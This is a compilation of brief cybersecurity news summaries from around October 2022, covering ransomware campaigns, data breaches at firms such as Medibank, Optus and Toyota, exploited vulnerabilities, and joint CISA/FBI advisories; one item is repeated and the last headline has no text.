    “A new Windows zero-day allows threat actors to use malicious stand-alone JavaScript files to bypass Mark-of-the-Web security warnings. Threat actors are already seen using the zero-day bug in ransomware attacks. Windows includes a security feature called Mark-of-the-Web (MoTW) that flags a file as having been downloaded from the Internet and, therefore, should be treated with caution as it could be malicious.

    Medibank Data Breach: More Customers Affected, Attacker Got in via Stolen Credentials

    Australian private health insurance provider Medibank has revealed that the hack and data breach it discovered over two weeks ago has affected more customers than initially thought, “We have received a series of additional files from the criminal. We have been able to determine that this includes: a copy of the file received last week containing 100 ahm policy records (including personal and health claims data); a file of a further 1,000 ahm policy records (including personal and health claims data); and files which contain some Medibank and additional ahm and international student customer data. It has become clear that the criminal has taken data that now includes Medibank customer data, in addition to that of ahm and international student customers,” the company said.

    US Charges Two Chinese Agents in Huawei Obstruction Case

    The US has announced another blockbuster set of charges against Chinese nationals in three cases, including one in which two agents are said to have paid bribes for inside information on the federal prosecution of Huawei. The US Department of Justice (DoJ) unveiled the charges yesterday and, although Huawei is not named, widespread reports claim it is the telco at the center of the case. The US filed a string of charges of racketeering and conspiracy to steal trade secrets against the firm in 2019 and 2020.

    Daixin Team Targets Health Organizations With Ransomware, US Agencies Warn

    CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team cybercrime group is actively targeting U.S. businesses, mainly in the Healthcare and Public Health (HPH) Sector, with ransomware operations. The Daixin Team is a ransomware and data extortion group that has been active since at least June 2022. The group focused on the HPH Sector with ransomware operations that aimed at deploying ransomware and exfiltrating personal identifiable information (PII) and patient health information (PHI) threatening to release the stolen data if a ransom is not paid.

    Botnet Distributing Self-Unlocking Password-Protected RAR Files to Drop Malware

    The notorious Emotet botnet has been linked to a new wave of malspam campaigns that take advantage of password-protected archive files to drop CoinMiner and Quasar RAT on compromised systems. In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, the first archive acting as a conduit to launch the second. While phishing attacks like these traditionally require persuading the target into opening the attachment, the cybersecurity company said the campaign sidesteps this hurdle by making use of a batch file to automatically supply the password to unlock the payload

    Thousands of GitHub Repositories Deliver Fake PoC Exploits With Malware

    Researchers at the Leiden Institute of Advanced Computer Science found thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them including malware. GitHub is one of the largest code hosting platforms, and researchers use it to publish PoC exploits to help the security community verify fixes for vulnerabilities or determine the impact and scope of a flaw. According to the technical paper from the researchers at Leiden Institute of Advanced Computer Science, the possibility of getting infected with malware instead of obtaining a PoC could be as high as 10.3%, excluding proven fakes and prankware.

    Typosquat Campaign Mimics 27 Brands to Push Windows, Android Malware

    A massive, malicious campaign is underway using over 200 typosquatting domains that impersonate twenty-seven brands to trick visitors into downloading various Windows and Android malware. Typosquatting is an old method of tricking people into visiting a fake website by registering a domain name similar to that used by genuine brands. The domains used in this campaign are very close to the authentic ones, featuring a single letter position swap or an additional "s," making them easy for people to miss. The malicious websites are clones of the originals or at least convincing enough, so there's not much to give away the fraud.

    Alert (AA22-294A) Daixin Team, Ransomware Attacks

    The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.

    CISA Tells Organizations to Patch Linux Kernel Vulnerability Exploited by Malware

    The vulnerability is tracked as CVE-2021-3493 and it’s related to the OverlayFS file system implementation in the Linux kernel. It allows an unprivileged local user to gain root privileges, but it only appears to affect Ubuntu. CVE-2021-3493 has been exploited in the wild by a stealthy Linux malware named Shikitega, which researchers at AT&T Alien Labs detailed in early September. Shikitega is designed to target endpoints and IoT devices running Linux, allowing the attacker to gain full control of the system. It has also been used to download a cryptocurrency miner onto the infected device.

    Health System Data Breach Due to Meta Pixel Hits 3 Million Patients

    Advocate Aurora Health (AAH), a 26-hospital healthcare system in Wisconsin and Illinois, is notifying its patients of a data breach that exposed the personal data of 3,000,000 patients. The incident was caused by the improper use of Meta Pixel on AAH's websites, where patients log in and enter sensitive personal and medical information. Meta Pixel is a JavaScript tracker that helps website operators understand how visitors interact with the site, helping them make targeted improvements. However, the tracker also sends sensitive data to Meta (Facebook) and is then shared with a massive network of marketers who target patients with advertisements that match their conditions.

    BlackByte Ransomware Uses New Data Theft Tool for Double-Extortion

    A BlackByte ransomware affiliate is using a new custom data stealing tool called 'ExByte' to steal data from compromised Windows devices quickly. Data exfiltration is believed to be one of the most important functions in double-extortion attacks, with BleepingComputer told that companies are more commonly paying ransom demands to prevent the leak of data than to receive a decryptor. Due to this, ransomware operations, including ALPHV and LockBit, are constantly working on improving their data theft tool.

    Multiple Vulnerabilities Cisco Products 10-17-2022

    Cisco has released information regarding several vulnerabilities impacting multiple products on October 17, 2022. Please see the links below for more information:

    • Cisco Identity Services Engine Cross-Site Scripting Vulnerability
    • Cisco TelePresence Collaboration Endpoint and RoomOS Software Vulnerabilities
    • Cisco Jabber Client Software Extensible Messaging and Presence Protocol Stanza Smuggling Vulnerability
    • Cisco Identity Services Engine Unauthorized File Access Vulnerability
    • Cisco Meraki MX and Z3 Teleworker Gateway VPN Denial of Service Vulnerability

    Vulnerabilities in Cisco Identity Services Engine require your attention (CVE-2022-20822, CVE-2022-20959)

    Cisco Identity Services is a policy management and access control platform for network devices and is a crucial element of an organization’s zero-trust architecture. Cisco has published a heads-up for admins of Cisco Identity Services Engine solutions about two vulnerabilities (CVE-2022-20822, CVE-2022-20959) that could be exploited to read and delete files on an affected device to execute arbitrary scripts or access sensitive information. Both vulnerabilities have been discovered and reported by Davide Virruso, a freelance bug hunter and a red team operator at managed security service provider Yoroi.

    NCSC CEO Calls for International Standards on IoT Security

    In a speech during Singapore’s International Cyber Week, NCSC CEO Lindy Cameron called for international standards to improve IoT security. “At every level, individual households, businesses, cities and local governments are keen to reap the benefits of ‘smart devices.’ The benefits are obviously compelling. They provide a range of critical functions and services to us all. This should be an opportunity, not a threat,” outlined Cameron. She pointed at Singapore, a country that has taken major strides in the use of connected devices to manage vital services, such as transport, waste, CCTV, streetlights, traffic lights, parking and emergency services.

    Internet Connectivity Worldwide Impacted by Severed EU Subsea Cables

    A major internet subsea fiber cable in the South of France was severed yesterday at 20:30 UTC, causing connectivity problems in Europe, Asia, and the United States, including data packet losses and increased website response latency. Cloud security company Zscaler reports that they made routing adjustments to mitigate the impact. However, users still face problems due to app and content providers routing traffic through the impacted paths.

    Hackers Use New Stealthy Powershell Backdoor to Target 60+ Victims

    A previously undocumented, fully undetectable PowerShell backdoor is being actively used by a threat actor who has targeted at least 69 entities. Based on its features, the malware is designed for cyberespionage, mainly engaging in data exfiltration from the compromised system. When first detected, the PowerShell backdoor was not seen as malicious by any vendors on the VirusTotal scanning service. However, its cover was blown due to operational mistakes by the hackers, allowing SafeBreach analysts to access and decrypt commands sent by the attackers to execute on infected devices.

    Researchers Share of Fabrixss Bug Impacting Azure Fabric Explorer

    Orca Security researchers have released technical details about a now-patched FabriXss vulnerability, tracked as CVE-2022-35829 (CVSS 6.2), that impacts Azure Fabric Explorer. An attacker can exploit the vulnerability to gain administrator privileges on the cluster. In order to exploit this flaw, an attacker needs to have CreateComposeDeployment permission. Orca Security reported the flaw to Microsoft in August 2022 and the company addressed it with the release of October 2022 Patch Tuesday updates

    Ransom Cartel linked to notorious REvil ransomware operation

    Researchers have linked the relatively new Ransom Cartel ransomware operation with the notorious REvil gang based on code similarities in both operations' encryptors. REvil reached its pinnacle of success in the first half of 2021, compromising thousands of companies in a Kaseya MSP supply-chain attack, demanding a $50 million payment from computer maker Acer, and extorting Apple using stolen blueprints of non-yet-released devices.

    Microsoft Office 365 Message Encryption (OME) doesn’t ensure confidentiality

    Researchers at the cybersecurity firm WithSecure discovered a bug in the message encryption mechanism used by Microsoft in Office 365 that can allow to access message contents due. The experts pointed out that Microsoft Office 365 Message Encryption (OME) relies on Electronic Codebook (ECB) mode of operation. The ECB mode is considered insecure and can reveal the structure of the messages sent, potentially leading to partial or full message disclosure. The OME method is used to send and receive encrypted email messages and the vulnerability can allow attackers to decipher the content of encrypted emails.

    Apache Commons Text Flaw Is Not a Repeat of Log4shell

    A freshly fixed vulnerability (CVE-2022-42889) in the Apache Commons Text library has been getting attention from security researchers these last few days, worrying it could lead to a repeat of the Log4Shell dumpster fire. But the final verdict shows there’s no need to panic: while the vulnerability is exploitable, “The nature of the vulnerability means that, unlike Log4Shell, it will be rare that an application uses the vulnerable component of Commons Text to process untrusted, potentially malicious input,” said Rapid7 AI researcher Erick Galinkin.

    Verizon Notifies Prepaid Customers Their Accounts Were Breached

    Verizon warned an undisclosed number of prepaid customers that attackers gained access to Verizon accounts and used exposed credit card info in SIM swapping attacks. "We determined that between October 6 and October 10, 2022, a third-party actor accessed the last four digits of the credit card used to make automatic payments on your account.

    FBI: Scammers Likely to Target US Student Loan Debt Relief Applicants

    The FBI has released a warning that scammers may be targeting individuals seeking to enroll in the Federal Student Aid program to steal their personal information, payment details, and money. Federal Student Aid is a debt relief program announced in August 2022 that opened for applications yesterday. The large amount of applicants present a unique targeting opportunity for cybercriminals, who will use various techniques to trick applicants into falling for fraudulent websites and phishing emails. Users should be on the lookout for phishing emails and SMS messages that mimic the application form for student loan relief.

    Ransomware Attack Halts Circulation of Some German Newspapers

    German newspaper ‘Heilbronn Stimme’ published today’s 28-page issue in e-paper form after a Friday ransomware attack crippled its printing systems. On Saturday, the newspaper issued an “emergency” six-page edition while all planned obituaries were posted on the website. Phone and email communication remained offline during the weekend. The regional publication has a circulation of about 75,000 copies, but due to printing issues has temporarily lifted the paywall from its website, which counts approximately 2 million visitors per month.

    Ransomware Attack Halts Circulation of Some German Newspapers

    German newspaper ‘Heilbronn Stimme’ published today’s 28-page issue in e-paper form after a Friday ransomware attack crippled its printing systems. On Saturday, the newspaper issued an “emergency” six-page edition while all planned obituaries were posted on the website. Phone and email communication remained offline during the weekend. The regional publication has a circulation of about 75,000 copies, but due to printing issues has temporarily lifted the paywall from its website, which counts approximately 2 million visitors per month.

    Malware Dev Claims to Sell New Blacklotus Windows UEFI Bootkit

    A threat actor is selling on hacking forums what they claim to be a new UEFI bootkit named BlackLotus, a malicious tool with capabilities usually linked to state-backed threat groups. UEFI bootkits are planted in the system firmware. They are invisible to security software running within the operating system because the malware loads in the initial stage of the booting sequence. While cybercriminals who want a license for this Windows bootkit have to pay $5,000, the threat actor says rebuilds would only set them back $200.

    Pro-Russia Hackers DDoS Bulgarian Government

    A wave of DDoS attacks rocked the Bulgarian government over the weekend, with Russia the prime suspect, according to reports. Traffic flooded the websites of the Bulgarian President, the National Revenue Agency, and the ministries of internal affairs, defense, and justice, according to several local reports. Telecoms firms, airports, banks and some media companies were also targeted in the October 15 campaign, according to the Sofia Globe.

    Chinese 'Spyder Loader' Malware Spotted Targeting Organizations in Hong Kong

    The China-aligned espionage-focused actor dubbed Winnti has set its sights on government organizations in Hong Kong as part of an ongoing campaign dubbed Operation CuckooBees. Active since at least 2007, Winnti (aka APT41, Barium, Bronze Atlas, and Wicked Panda) is the name designated to a prolific cyber threat group that carries out Chinese state-sponsored espionage activity, predominantly aimed at stealing intellectual property from organizations in developed economies.

    Critical Remote Code Execution Issue Impacts Popular Post-exploitation Toolkit Cobalt Strike

    HelpSystems addressed a critical remote code execution vulnerability in their commercial post-exploitation toolkit Cobalt Strike. The vulnerability is tracked as CVE-2022-42948, and allows a remote attacker to take control of a targeted system. By manipulating some client-side UI input fields, threat actors can simulate a Cobalt Strike implant check-in, or hook the implant running on a host.

    Threat Actors Hacked Hundreds of Servers by Exploiting Zimbra CVE-2022-41352 Bug

    Last week, researchers from Rapid7 warned of the exploitation of unpatched zero-day remote code execution vulnerability, tracked as CVE-2022-41352, in the Zimbra Collaboration Suite. Rapid7 has published technical details, including a proof-of-concept (PoC) code and indicators of compromise (IoCs) regarding CVE-2022-41352 on AttackerKB. The issue has been rated as CVSS 9.8” (Security Affairs, 2022). “CVE-2022-41352 is an unpatched remote code execution vulnerability in Zimbra Collaboration Suite discovered in the wild due to active exploitation.” reported Rapid7.

    Black Basta Ransomware Hackers Infiltrates Networks via Qakbot to Deploy Brute Ratel C4

    The threat actors behind the Black Basta ransomware family have been observed using the Qakbot trojan to deploy the Brute Ratel C4 framework as a second-stage payload in recent attacks. The development marks the first time the nascent adversary simulation software is being delivered via a Qakbot infection, cybersecurity firm Trend Micro said in a technical analysis released last week The intrusion, achieved using a phishing email containing a weaponized link pointing to a ZIP archive, further entailed the use of Cobalt Strike for lateral movement. While these legitimate utilities are designed for conducting penetration testing activities, their ability to offer remote access has made them a lucrative tool in the hands of attackers looking to stealthily probe the compromised environment without attracting attention for extended periods of time.

    Mysterious Prestige Ransomware Targets Organizations in Ukraine and Poland

    Microsoft reported that new Prestige ransomware is being used in attacks aimed at transportation and logistics organizations in Ukraine and Poland. The Prestige ransomware first appeared in the threat landscape on October 11 in attacks occurring within an hour of each other across all victims. A notable feature of this campaign is that it is uncommon to observe threat actors attempting to deploy ransomware into the networks of Ukrainian enterprises. Microsoft pointed out that this campaign was not connected to any of the 94 currently active ransomware activity groups that it is tracking.

    Venus Ransomware Targets Publicly Exposed Remote Desktop Services

    Threat actors behind the relatively new Venus Ransomware are hacking into publicly-exposed Remote Desktop services to encrypt Windows devices. Venus Ransomware appears to have begun operating in the middle of August 2022 and has since encrypted victims worldwide. However, there was another ransomware using the same encrypted file extension since 2021, but it is unclear if they are related.

    Everything We Know About the Mango Markets Hack

    Mango Markets is a trading platform riding on the Solana blockchain. Mango Markets says that the platform halted operations to cease all deposits and withdrawals to limit the attack's impact. "This incident has effectively resulted in a total draining of all equity available." When hacker who stole $117 million in digital assets from their decentralized finance exchange says they will now return the funds — but only if token holders let them keep $70 million without the possibility of criminal prosecution.

    Malware Infects Over 800 Corporate Users in New, Ongoing Campaign

    Between September 28 and October 7, Kaspersky observed close to 1,800 users infected with QBot worldwide. More than half of the new victims are corporate users. According to security researchers, the United States, Italy, Germany, and India are the countries targeted the most in these recent campaigns. Out of a total of 220 victims in the United States, 95 are corporate users, potentially exposing their organizations to further malicious activity, including distributing ransomware and other malware families.

    Polonium APT Targets Israel With a New Custom Backdoor Dubbed Papacreep

    MSTIC has observed POLONIUM active on or targeting multiple organizations previously compromised by Iran-linked MuddyWater APT (aka MERCURY). According to Microsoft, POLONIUM is an APT group based in Lebanon that coordinates its activities with other actors affiliated with the Iranian Ministry of Intelligence and Security. Now ESET researchers reported that the APT group had used at least seven different custom backdoors since September 2021 against Israeli targets. Most of the attacks were spotted on September 2022, and the custom tools developed by the group allowed them to spy on the victims.

    New NPM Timing Attack Could Lead To Supply Chain Attacks

    Security researchers have discovered an NPM timing attack that reveals the names of private packages so threat actors can release malicious clones publicly to trick developers into using them instead. The attack relies on a slight time difference in returning a "404 Not Found" error when searching for a private compared to a non-existent package in the repository. While the response time difference is only a few hundred milliseconds, it is enough to determine whether a private package exists to perform package impersonation attacks. Organizations create private packages for internal projects and certain software products to minimize the risk of their development teams falling for typo squatting attacks and to keep their code and functions secret.

    New Alchimist Attack Framework Targets Windows, Macos, Linux

    Cybersecurity researchers have discovered a new attack and C2 framework called 'Alchimist,' which appears to be actively used in attacks targeting Windows, Linux, and macOS systems. The framework and all its files are 64-bit executables written in GoLang, a programming language that makes cross-compatibility between different operating systems a lot easier. Alchimist offers a web-based interface using the Simplified Chinese language, and it's very similar to Manjusaka, a recently-emerged post-exploitation attack framework growing popular among Chinese hackers.

    VMware vCenter Server Bug Disclosed Last Year Still Not Patched

    VMware informed customers today that vCenter Server 8.0 (the latest version) is still waiting for a patch to address a high-severity privilege escalation vulnerability disclosed in November 2021. CrowdStrike's Yaron Zinar found this security flaw (CVE-2021-22048) and Sagi Sheinfeld in vCenter Server's IWA (Integrated Windows Authentication) mechanism also affects VMware's Cloud Foundation hybrid cloud platform deployments. Attackers with non-administrative access can exploit it to elevate privileges to a higher privileged group on unpatched servers.

    Google Forms Abused in New COVID-19 Phishing Wave in the U.S.

    In the latest attacks, phishing emails impersonate the U.S. Small Business Administration (SBA) and abuse Google Forms to host phishing pages that steal the personal details of business owners. The SBA ran COVID-19 financial recovery programs in the past, which adds legitimacy to the campaign, especially for previous beneficiaries. However, the organization is currently not running any similar initiatives.

    Microsoft October 2022 Patch Tuesday fixes zero-day used in attacks, 84 flaws

    As part of the October Patch Tuesday, Microsoft addressed 84 vulnerabilities, including two zero-days (one of which is actively being exploited in attacks in the wild. Of the 84 flaws, there was 39 elevation of privilege vulnerabilities, 2 security feature bypass vulnerabilities, 20 remote code execution vulnerabilities, 11 information discloser vulnerabilities, 8 denial of service vulnerabilities, and 4 spoofing vulnerabilities. 13 of the 84 flaws have been rated critical in severity and relate to spoofing, privilege elevation, and remote code execution.

    Claroty Found Hardcoded Cryptographic Keys in Siemens PLCs Using RCE

    Team82, the research arm of New York-based industrial cybersecurity firm Claroty, revealed on October 11, 2022, that they managed to extract heavily guarded, hardcoded cryptographic keys embedded within SIMATIC S7-1200/1500s, a range of Siemens programmable logic computers (PLCs), and TIA Portal, Siemens’ automated engineering software platform.

    Fortinet Says Critical Auth Bypass Bug Is Exploited in Attacks

    Fortinet has confirmed today that a critical authentication bypass security vulnerability patched last week is being exploited in the wild. The security flaw (CVE-2022-40684) is an auth bypass on the administrative interface that enables remote threat actors to log into FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager (FSWM) on-premise management instances.

    Hackers Behind IcedID Malware Attacks Diversify Delivery Tactics

    The threat actors behind IcedID malware phishing campaigns are utilizing a wide variety of distribution methods, likely to determine what works best against different targets. Researchers at Team Cymru have observed several campaigns in September 2022, all following slightly different infection pathways, which they believe is to help them evaluate effectiveness. Moreover, the analysts have noticed changes in the management of command and control server (C2) IPs used in the campaigns, now showing signs of sloppiness.

    Caffeine Service Lets Anyone Launch Microsoft 365 Phishing Attacks

    A phishing-as-a-service (PhaaS) platform named 'Caffeine' makes it easy for threat actors to launch attacks, featuring an open registration process allowing anyone to jump in and start their own phishing campaigns. Caffeine doesn't require invites or referrals, nor does it require wannabe threat actors to get approval from an admin on Telegram or a hacking forum. Due to this, it removes much of the friction that characterizes almost all platforms of this kind. Another distinctive characteristic of Caffeine is that its phishing templates target Russian and Chinese platforms, whereas most PhaaS platforms tend to focus on lures for Western services.

    Toyota Discloses Data Leak After Access Key Exposed on Github

    Toyota Motor Corporation is warning that customers' personal information may have been exposed after an access key was publicly available on GitHub for almost five years. Toyota T-Connect is the automaker's official connectivity app that allows owners of Toyota cars to link their smartphone with the vehicle's infotainment system for phone calls, music, navigation, notifications integration, driving data, engine status, fuel consumption, and more. Toyota discovered recently that a portion of the T-Connect site source code was mistakenly published on GitHub and contained an access key to the data server that stored customer email addresses and management numbers.

    Pro-Russian Group KillNet Claims Responsibility for 14 US Airport DDoS Attacks

    On Monday, October 10, 2022, the websites of several US airports were disrupted due to a large-scale campaign of distributed denial-of-service (DDoS) attacks, in which servers were flooded with web traffic to knock websites offline. The victims include Los Angeles International Airport (LAX), Hartsfield-Jackson Atlanta International Airport (ATL), Chicago O'Hare International Airport (ORD), as well as other airports in Florida, Colorado, Arizona, Kentucky, Mississippi and Hawaii.

    LilithBot Malware, A New MaaS Offered by the Eternity Group

    Zscaler researchers linked a recently discovered sample of a new malware called LilithBot to the Eternity group (aka EternityTeam; Eternity Project). The Eternity group operates a homonymous malware-as-a-service (MaaS), it is linked to the Russian “Jester Group,” which is active since at least January 2022.

    US Healthcare Giant CommonSpirit Hit by Possible Ransomware

    One of the largest non-profit healthcare providers in the US has been hit by a suspected ransomware attack which has already impacted multiple locations around the country. CommonSpirit claims to run over 1000 sites and 140 hospitals in 21 states. In a brief message yesterday it said it had “identified an IT security issue” affecting some facilities.

    Fortinet Warns Admins to Patch Critical Auth Bypass Bug Immediately

    Fortinet has warned administrators to update FortiGate firewalls and FortiProxy web proxies to the latest versions, which address a critical severity vulnerability. The security flaw (tracked as CVE-2022-40684) is an authentication bypass on the administrative interface that could allow remote threat actors to log into unpatched devices.

    Govt Shares Top Flaws Exploited by Chinese Hackers Since 2020

    NSA, CISA, and the FBI revealed today the top security vulnerabilities most exploited by hackers backed by the People's Republic of China (PRC) to target government and critical infrastructure networks. The three federal agencies said in a joint advisory that Chinese-sponsored hackers are targeting U.S. and allied networks and tech companies to gain access to sensitive networks and steal intellectual property.

    Lofygang Hackers Built a Credential-Stealing Enterprise on Discord, NPM

    The 'LofyGang' threat actors have created a credential-stealing enterprise by distributing 200 malicious packages and fake hacking tools on code hosting platforms, such as NPM and GitHub. Researchers highlighted some of these packages in recent reports by Kaspersky, Jfrog, and Sonatype, who spotted them in supply chain attacks using typo-squatted package names. Many malicious packages have been reported and removed, while others are available for download. There's even a dedicated project to search for and track malicious LofyGang packages on GitHub. A bot on Discord, named "Lofy Boost," can be used by channel members to purchase Nitro using a stolen credit card on behalf of the user. The bot also receives user tokens, which the crooks may abuse later. The stash of the stolen credit cards comes from NPM supply chain infections and by pushing laced and backdoored hacking tools on GitHub, which less skilled cybercriminals grab and use free of charge.

    Police Arrest Teen for Using Leaked Optus Data to Extort Victims

    The Australian Federal Police (AFP) have arrested a 19-year old in Sydney for allegedly using leaked Optus customer data for extortion. More specifically, the suspect used 10,200 records leaked last month by the Optus hackers and contacted victims over SMS to threaten that their data would be sold to other hackers unless they paid AUD 2,000 ($1,300) within two days. The scammer used a Commonwealth Bank of Australia account to receive the ransom money. The AFP identified the account and obtained from the bank information about the holder.

    Details Released for Recently Patched new macOS Archive Utility Vulnerability

    Security researchers have shared details about a now-addressed security flaw in Apple's macOS operating system that could be potentially exploited to run malicious applications in a manner that can bypass Apple's security measures. The vulnerability, tracked as CVE-2022-32910, is rooted in the built-in Archive Utility and "could lead to the execution of an unsigned and unnotarized application without displaying security prompts to the user, by using a specially crafted archive.

    Discloses Data Breach Impacting Former and Current Employees

    Australia’s largest telecommunications company Telstra disclosed a data breach through a third-party supplier. The company pointed out that its systems have not been breached, the security breach impacted a third-party supplier that previously provided a now-obsolete Telstra employee rewards program” (Security Affairs, 2022). This story comes just after another Australian telecom Optus, suffered a severe cyber attack that leaked customer data.

    Avast Releases Free Decryptor for Hades Ransomware Variants

    Avast has released a decryptor for variants of the Hades ransomware known as 'MafiaWare666', 'Jcrypt,' 'RIP Lmao', and 'BrutusptCrypt,' allowing victims to recover their files for free. The security company says it discovered a flaw in the encryption scheme of the Hades strain, allowing some of the variants to be unlocked. However, this may not apply to newer or unknown samples that use a different encryption system.

    Blackbyte Ransomware Abuses Legit Driver to Disable Security Products

    The BlackByte ransomware gang is using a new technique that researchers are calling "Bring Your Driver," which enables bypassing protections by disabling more than 1,000 drivers used by various security solutions. Recent attacks attributed to this group involved a version of the MSI Afterburner RTCore64.sys driver, vulnerable to a privilege escalation and code execution flaw tracked as CVE-2019-16098.

    Netwalker Ransomware Affiliate Sentenced to 20 Years in Prison

    Former Netwalker ransomware affiliate Sebastien Vachon-Desjardins has been sentenced to 20 years in prison and demanded to forfeit $21.5 million for his attacks on a Tampa company and other entities. Vachon-Desjardins, a 34 Canadian man extradited from Quebec, was sentenced today in a Florida court after pleading guilty to 'Conspiracy to commit Computer Fraud', 'Conspiracy to Commit Wire Fraud', 'Intentional Damage to Protected Computer,' and 'Transmitting a Demand in Relation to Damaging a Protected Computer.' He is also required to serve three years of supervised release after he gets out of prison. During this term, Vachon-Desjardins will not be allowed to have a job in information technology or use a computer capable of connecting to the Internet, including a smartphone, gaming device, or other electronic devices.

    Optus Confirms 2.1 Million ID Numbers Exposed in Data Breach

    In a press statement released yesterday, the mobile carrier updated the information regarding the personal data of 9.8 million customers exposed during the attack. Of these 2.1 million customers, 1.2 million had at least one number from a current and valid form of identification compromised, and 900,000 had ID numbers exposed but from documents that are now expired, However, all 9.8 million customers had other personal information exposed, including email addresses, date of birth, or phone numbers.

    Qakbot: Analysing a Modern-Day Banking Trojan

    QakBot is a banking trojan that has been in development for around 15 years. Overtime it has evolved significantly and continues to impact organizations globally. Recently, the malware has been used to spy on financial operations and to install ransomware. Researchers from Menlo Labs shared their QakBot findings after observing several campaigns. QakBot uses various Highly Evasive Adaptive Threat (HEAT) techniques. “HEAT attacks are a new class of attack methods built specifically to avoid detection from common layers in traditional security stacks.

    New Android Malware 'RatMilad' Can Steal Your Data, Record Audio

    A new Android spyware named 'RatMilad' was discovered targeting mobile devices in the Middle East, used to spy on victims and steal data. The RatMilad spyware was discovered by mobile security firm Zimperium who warned that the malware could be used for cyber espionage, extortion, or to eavesdrop on victim's conversations. Data stolen from the malware is being used to access private corporate networks, blackmail a victim, and more. The spyware is distributed masquerading as a fake virtual number generator called NumRent, which would be used for automating the activation of social media accounts. The app requests risky permissions, then abuses those to sideload the RatMilad payload onto the device.

    CISA, FBI & NSA Release Advisory on APT Cyber Activity Targeting Defense Industrial Base Orgs

    The U.S. Government yesterday released an alert about state-backed hackers using a custom CovalentStealer malware and the Impacket framework to steal sensitive data from a U.S. organization in the Defense Industrial Base (DIB) sector. According to the report, the compromise lasted for about 10 months, and allowed multiple APT groups to gain initial access through the victims Microsoft Exchange Server in January of last year. The hackers used a combination of a custom malware called CovalentStealer and an open source tool called Impacket to carry out their attacks.

    Linux Cheerscrypt Ransomware Is Linked to Chinese Dev-0401 APT Group

    Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10). Bronze Starlight has been active since mid-2021; researchers from Secureworks reported that the A.P.T. group is deploying post-intrusion ransomware families to cover up the cyber espionage operations.

    CISA, FBI and NSA Release Advisory on APT Cyber Activity Targeting Defense Industrial Base Orgs

    Today, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA) released a joint Cybersecurity Advisory (CSA) with details on advanced persistent threat (APT) actors using an open-source toolkit and custom data exfiltration tool to steal sensitive data from a defense industrial base (DIB) sector organization’s enterprise network.

    Live support service hacked to spread malware in supply chain attack

    The official installer for the Comm100 Live Chat application, a widely deployed SaaS (software-as-a-service) that businesses use for customer communication and website visitors, was trojanized as part of a new supply-chain attack. A report from CrowdStrike says that the infected variant was available from the vendor's website from at least September 26 until as the morning of September 29. Because the trojanized installer used a valid digital signature, antivirus solutions would not trigger warnings during its launch, allowing for a stealthy supply-chain attack.

    Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub

    Scammers are impersonating security researchers to sell fake proof-of-concept ProxyNotShell exploits for newly discovered Microsoft Exchange zero-day vulnerabilities. Last week, Vietnamese cybersecurity firm GTSC disclosed that some of their customers had been attacked using two new zero-day vulnerabilities in Microsoft Exchange. Working with Trend Micro's Zero Day Initiative, the researchers disclosed the vulnerabilities privately to Microsoft, who confirmed that the bugs were being exploited in attacks and that they were working on an accelerated timeline to release security updates.

    FBI Warns of "Pig Butchering" Cryptocurrency Investment Schemes

    The Federal Bureau of Investigation (FBI) warns of a rise in 'Pig Butchering' cryptocurrency scams used to steal ever-increasing amounts of crypto from unsuspecting investors. The warning was issued as a Private Industry Notification from the FBI Miami Field Office in coordination with the Internet Crime Complaint Center (IC3) yesterday to raise awareness among cryptocurrency investors who are increasingly being targeted by these types of scams.

    Russian Retail Chain ‘DNS’ Confirms Hack After Data Leaked Online

    Russian retail chain 'DNS' (Digital Network System) disclosed yesterday that they suffered a data breach that exposed the personal information of customers and employees. DNS is Russia's second-largest computer and home appliance store chain, with 2,000 branches and 35,000 employees. According to the scant details provided in the announcement, a group of hackers residing outside the Russian Federation exploited a security gap in the company's IT systems and accessed customer and employee details. While the firm has not provided details on what information was compromised, it clarified that the hackers didn't steal user passwords and payment card data, as that data isn't stored on their systems.

    Blackcat Ransomware Gang Claims to Have Hacked Us Defense Contractor NJVC

    The ALPHV/BlackCat ransomware gang claims to have breached the IT firm NJVC, which supports the federal government and the United States Department of Defense. The company supports intelligence, defense, and geospatial organizations. The company has more than 1,200 employees in locations worldwide. BlackCat added NJVC to the list of victims on its Tor leak site and is threatening to release the allegedly stolen data if the company will not pay the ransom, “We strongly recommend that you contact us to discuss your situation. Otherwise, the confidential data in our possession will be released in stages every 12 hours. There is a lot of material,” reads the ALPHV’s statement.

    Ransomware Gang Leaks Data Stolen From LAUSD School System

    The Vice Society Ransomware gang published data and documents Sunday morning that were stolen from the Los Angeles Unified School District during a cyberattack earlier this month. LAUSD superintendent Alberto M. Carvalho confirmed the release of stolen data in a statement posted to Twitter and announced a new hotline launching tomorrow morning for concerned parents and students to ask questions about the data leak. The public release of data comes after the school system announced Friday that they would not be giving in to the ransom demands and that the district could better use the money for students and their education.

    Hackers Exploiting Dell Driver Vulnerability to Deploy Rootkit on Targeted Computers

    The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver, highlighting new tactics adopted by the state-sponsored adversary. The Bring Your Own Vulnerable Driver (BYOVD) attack, which took place in the autumn of 2021, is another variant of the threat actor's espionage-oriented activity called Operation In(ter)ception that's directed against aerospace and defense industries.

    Ex-NSA Employee Arrested for Trying to Sell U.S. Secrets to a Foreign Government

    A former U.S. National Security Agency (NSA) employee has been arrested on charges of attempting to sell classified information to a foreign spy, who was actually an undercover agent working for the Federal Bureau of Investigation (FBI). Jareh Sebastian Dalke, 30, was employed at the NSA for less than a month from June 6, 2022, to July 1, 2022, serving as an Information Systems Security Designer as part of a temporary assignment in Washington D.C.

    Microsoft Exchange Server Zero-day Mitigation Can be Bypassed

